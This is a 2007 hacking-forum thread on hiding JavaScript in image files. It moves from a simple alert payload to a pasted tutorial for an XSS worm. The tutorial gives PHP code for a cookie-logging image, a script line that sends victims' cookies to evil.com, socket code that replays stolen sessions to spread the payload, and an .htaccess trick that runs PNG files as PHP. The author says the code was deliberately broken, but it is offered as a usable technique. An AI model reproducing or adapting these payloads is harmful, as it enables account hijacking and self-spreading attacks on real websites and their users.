Follow us on Twitter!
It is the path of least resistance that makes rivers and men crooked. - Bj Palmer
Friday, April 18, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 11
Guests Online: 11
Members Online: 0

Registered Members: 82822
Newest Member: TheBunter
Latest Articles
View Thread

HellBound Hackers | Events | General

Author

javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 03:08
Can I put javascript in an image? If so how do I? Or what could I do to make a popup and the only way to close it is click Ok and the Ok be a link?


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 03:10
you can put js in an image like this (very simple way):
Code
<script>alert(String.fromCharCode(79, 119, 110, 101, 100, 32, 98, 121, 32, 101, 110, 100, 51, 114))</script>



Then save it as x.bmp or x.jpg whichever, on a site as a file by itself, and link to it, and you got it.


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 03:19
Thank you very much!


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 03:25
no problem


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 04:07
Hey could some one make me an image with a code the when ever the page is loaded it executes? I need the link to be /?logout


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 07:40
Ok you asked for help, someone gave it to you. You need to learn how to do it yourself now. The whole point is to LEARN. I'm not trying to be a dick, but there are worst posts you could get than this.


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 09:19
First that isn't an image is just a HTML file with another extension. You need to trial and error to make that work into a real image. From what i know this isn't work directly in FireFox. You must do another trick to make it works in FireFox, but i will not tell you the trick i let you discover.
i want to say that if you go let say to

http://blah.com/js_in_img.jpg


with FireFox and that file contain what end3r suggested then you will get something like
File contain an error

or another thing who say "You Failed"

But in Internet Explorer(tested on 6.0.2180) works without that trick Wink

Here is an example, access it with FF and then IE:
http://droptix.it. . .m/test.jpg


Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 10:02
A fun way is to use HTTP's refresh header to cause a reload directed towards javascript:...
Of course this means it only works if they view the image by it's own, not if it's embedded in some page.
For a demo see this link: [sid.selfip.org]. The link may die on occasion.




Edited by on 01-09-07 10:04
Author

RE: javascript in an image?

mido
Member

Your avatar

Posts: 613
Location: Cairo, Egypt
Joined: 27.01.07
Rank:
Monster
Posted on 01-09-07 10:29
Very nice trick. I loved it!


www.hellboundhackers.org/sig/r/16019.png

mido_eg3[at]hotmail.com
Author

RE: javascript in an image?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 01-09-07 14:16
Yeah, you can. Both JS and server side. I wrote a tutorial on how to use PHP to build an XSS worm. Incidently, the cookie stealer portion uses an image. I pasted the tutorial below so you can see how to make additional requests to pages, etc. with server side code combined with javascript and post variables. You will also be able to inject JS using this method. Some slight moditifications to this code will allow you to inject JS into your image (although, in a since, you already are in this method, hough indirectly) -- but I find having the image to all the work is a far superior approach. Why code something in JS if you can do it in PHP in half the lines? Now, there are instances in which you must use only JS, but so long as you are using an image, this method will work. Perhaps not for stealing a cookie, but with some modifications you don't even need to stick the ?cookie=document.cookie onto the end of your XSS attack -- you can have the PHP image do that work for you, too.

Since I know the formatting will screw up, here is a link so you can DL it: http://picobsd.amdwebhost.com/~cfc/xss.txt.gz

DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE THAT IS DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC PURPOSES ONLY, MEANT OT DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO.


A while back, I was poking around a web 2.0 site. I noticed something rather interesting: every single preference for users had it's own file. This was probably done because the site, which was AJAX based, modified user information via AJAX, and therefore often times there was only one value being edited at a time. I started poking around these, and I found out early on that all data sanitation was done with Javascript. I'm assuming this is because the developer was more comfortable with javascript, and didn't use PHP for anything except what he had to (editing database fields, etc.) Because filtering was done via javascript, I figured it wasn't done on the PHP side (I was correct), so if I could access the file directly, I was in business.

It worked. site.com/users_neighborhood.php was accessable, and when I edited my neighbourhood, I was able to insert a cookie stealer. The cookie stealer employed my favourite concept, albeit not always possible: the image. Which brings me to my first segment of code, the cookie stealer itself:
Code
<?php
 $data = $_GET['data'];             #get the cookie

 #create image
 header("Content-type: image/png"); #this is a PNG file
 $image = imagecreate(1,1);         #create a 1x1 image
 imagecolorallocate(1,1,1);         #set BG to white
 imagepng($image);                  #display the image
 imagedestroy($image);              #delete image from temp memory

 #store cookie
 $fp = fopen("misc.html","r");      #open log file and append it
 fputs($fp, $data."<br>");          #add the data
 fclose($fp);                       #close file
?>




This code simply created a PNG image and set the file's output content-type to PNG.

And the Javascript looked like this:
<script>document.write("<img src='http://evil.com/image.php?data=" document.cookie "'>");</script>

So, easy part down. Next is the propagation technique. I had a PHP program, and it contains a variable with the entire cookie in it. So the obvious thing to do at this point was to use sockets to connect to our target site's users_neighborhood.php page with the hijacked cookie. I did this by opening a socket and passing data to it. Here's the code:
Code
<?PHP
 #Connect Data
 $host   = "site.com";                #URL
 $page   = "/users_neighborhood.php"; #page
 $agent  = "BorgBrowser";             #user agent, used to specify the browser/program (googlebot, mozilla firefox, etc.)
 $cookie = $data;                     #The cookie from above
 $xss    = "%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E"; #A URL encoded version of the XSS attack
 $attack   = "neighborhood=".$xss;      #POST data with the XSS attack in it.
?>




This section of code just set up all the variables used later.

Code
<?php
 #Make Packet
 function makePacket($host, $page, $agent, $rnum, $cookie, $data)
 {
  #Generate the packet
  $packet  = "POST  ".$page." HTTP/1.1\r\n";                        #POST to the users_neighborhood page
  $packet .= "Host: ".$host."\r\n";                                 #specify the host
  $packet .= "User-Agent: ".$agent."\r\n";                          #specify the user agent
  $packet .= "Content-type: application/x-www-form-urlencoded\r\n"; #the content type
  $packet .= "Content-length: ".strlen($data)."\r\n";               #the content length, found by str_len, which finds the length of a variable
  $packet .= "Set-Cookie: ".$cookie."\r\n";                         #And, set the cookie
  $packet .= $attack;                                               #and finally, our payload

  #return packet
  return  $packet;                                                  #return the packet
 }
?>




This section is a function which allows us to create a valid HTTP/1.1 packet with POST data and cookie data in it.

Code
<?php
 #open network connection
 $port         = getservbyname('www', 'tcp');                  #get the TCP port the WWW service uses
 $addr         = gethostbyname($host);                         #get the address of our host, as defined above
 $socket       = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); #create a socket
 $result       = socket_connect($socket, $addr, $port);        #connect to the host on the WWW's port
?>




this section created our network connection to the site

Code

<?php
 #Send Data
 $in = makePacket($host, $page, $agent, $rnum, $cookie, $data); #Get the output of the makePacket function created above
 socket_write($socket, $in, strlen($in));                       #write to the socket the packet

 #close network connection
 socket_close($socket);                                         #Close the socket connection
?>




This section of code wrote the HTTP packet to the site



What we have done is used the XSS exploit in the site steal to cookie. Our cookie stealer script not only logs cookies, but it is also used to authenticate us as that user and grant us the ability to edit THEIR content, and steal cookies using their page as well.


/end


One modification you make to the code: use .png instead of .php for your file name (modify the XSS attack code accordingly, and drop this in the same folder with the name of .htaccess (note the dot at the beginning);
Code
AddType application/x-httpd-php png




This will force your server to see any file with a PNG extension as a PHP file.




Edited by on 01-09-07 14:24
Author

RE: javascript in an image?

mido
Member

Your avatar

Posts: 613
Location: Cairo, Egypt
Joined: 27.01.07
Rank:
Monster
Posted on 01-09-07 14:31
People can come up with really very nice information in this thread.


www.hellboundhackers.org/sig/r/16019.png

mido_eg3[at]hotmail.com